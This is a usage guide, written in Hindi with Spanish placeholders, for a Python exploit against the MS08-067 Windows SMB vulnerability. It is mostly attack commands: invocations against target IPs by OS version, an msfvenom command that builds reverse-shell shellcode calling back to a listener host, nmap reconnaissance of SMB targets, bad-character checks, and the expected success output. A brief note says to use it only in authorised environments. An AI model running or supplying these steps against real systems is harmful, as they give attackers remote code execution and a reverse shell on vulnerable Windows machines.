पूर्ण उपयोग गाइड: # Exploit MS08-067 Mejorado
📌 बुनियादी उपयोग
python3 Exploit_MS08-067.py <IP_VÍCTIMA> <VERSIÓN_OS> [OPCIONES]
🎯 व्यावहारिक उदाहरण
1. Windows XP SP0/SP1 (डिफ़ॉल्ट पोर्ट 445)
python3 Exploit_MS08-067.py 192.168.1.100 1
2. Windows 2003 SP1 English (पोर्ट 139)
python3 Exploit_MS08-067.py 192.168.1.150 4 -p 139
3. कस्टम शेलकोड के साथ
python3 Exploit_MS08-067.py 192.168.1.200 6 -s /ruta/mishellcode.bin
🔍 अनिवार्य पैरामीटर
| पैरामीटर | विवरण | मान्य मान |
|---|
IP_VÍCTIMA | लक्ष्य का IP | कोई भी IPv4 |
VERSIÓN_OS | कमजोर OS का संस्करण | 1-7 (तालिका देखें) |
📋 समर्थित संस्करणों की तालिका
| मान | ऑपरेटिंग सिस्टम | आर्किटेक्चर |
|---|
| 1 | Windows XP SP0/SP1 Universal | x86 |
| 2 | Windows 2000 Universal | x86 |
| ... | ... | ... |
⚙️ अतिरिक्त विकल्प
| विकल्प | विवरण | डिफ़ॉल्ट |
|---|
-p/--port | SMB पोर्ट (445/139) | 445 |
|
🛠️ msfvenom के साथ शेलकोड उत्पन्न करना
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.201 LPORT=4484 \
EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode \
-a x86 --platform windows
🔎 लक्ष्य की पहचान
nmap -p 139,445 --script smb-os-discovery <IP_VÍCTIMA>
🚨 सामान्य समस्याओं का समाधान
Error: STATUS_OBJECT_NAME_NOT_FOUND
-
जाँच करें कि Browser सेवा सक्रिय है या नहीं:
nmap -p 445 --script smb-enum-shares <IP>
-
दूसरे पाइप के साथ प्रयास करें (स्क्रिप्ट को संशोधित करें):
# Cambiar \\pipe\\browser por \\pipe\\srvsvc
शेलकोड निष्पादित नहीं होता
- निषिद्ध वर्णों की जाँच करें:
\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
- मान्य करने के लिए इस कमांड का उपयोग करें:
msfvenom -p windows/exec CMD="calc.exe" -f raw | xxd | grep -E "00|0a|0d|5c|5f|2f|2e|40"
💡 नैतिक सिफारिशें
✅ केवल अधिकृत वातावरण में उपयोग करें
❌ अनुमति के बिना उत्पादन प्रणालियों पर कभी उपयोग न करें
📊 अपेक्षित सफल आउटपुट
[*] Targeting 192.168.1.100 | OS: 1 | Port: 445
[+] Connected to 192.168.1.100 on port 445
[*] Sending exploit...
[+] Exploit finished - Check your listener!
⚠️ नोट: यह एक्सप्लॉइट MS08-067 बुलेटिन के साथ पैच किए गए सिस्टम पर काम नहीं करता है।